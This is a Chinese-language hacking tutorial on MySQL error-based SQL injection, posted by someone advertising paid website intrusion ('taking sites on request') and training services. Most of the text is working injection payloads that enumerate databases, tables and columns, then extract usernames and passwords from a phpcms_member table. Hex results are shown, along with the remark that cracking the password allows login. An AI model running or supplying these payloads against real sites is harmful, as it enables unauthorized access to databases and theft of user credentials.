mysql報錯注入

                                                  mysql報錯注入

大家好 我是~  式 QQ:40497992

本人承接任何網站安全檢測 指定拿站 網站開發 軟體開發 seo 收學員 等其業務

沒儲存 算了 就是這種 無亂是and 1=1 1=2都是返回正常頁面的

盲豬也是沒戲的 欄位19

網上貌似有介紹都這個注入代碼的 

但是很多測試都沒成功

嘎嘎 這些百度都有 不過很少

下面我來示範一下 怎麼進行 報錯注入

爆所有庫
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group
by x)a) and 1=1

接著下去也是可以查出所有庫的

爆當前資料庫
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

415256303332 這個就是hex 當前庫的 轉換一下看看 ARV032 就是這個
接著
暴表
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x415256303332 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x
from information_schema.tables group by x)a) and 1=1

70687062625F61636C5F67726F757073 還需要轉換一下
phpbb_acl_groups 這個不是 玩個phpcms2008的人都知道 是phpcms_member 這個才對 大家就自已去查詢把 只要改一下數字就行了

爆欄位
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x415256303332 and table_name=0x706870636D735F6D656D626572 limit 0,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

username password
爆內容
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,phpcms_member.username,0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and
1=1

密碼破譯不出來 嘎嘎 只要破到密碼就能登進去了  好把 今天的教材就到這裡咯 嘎嘎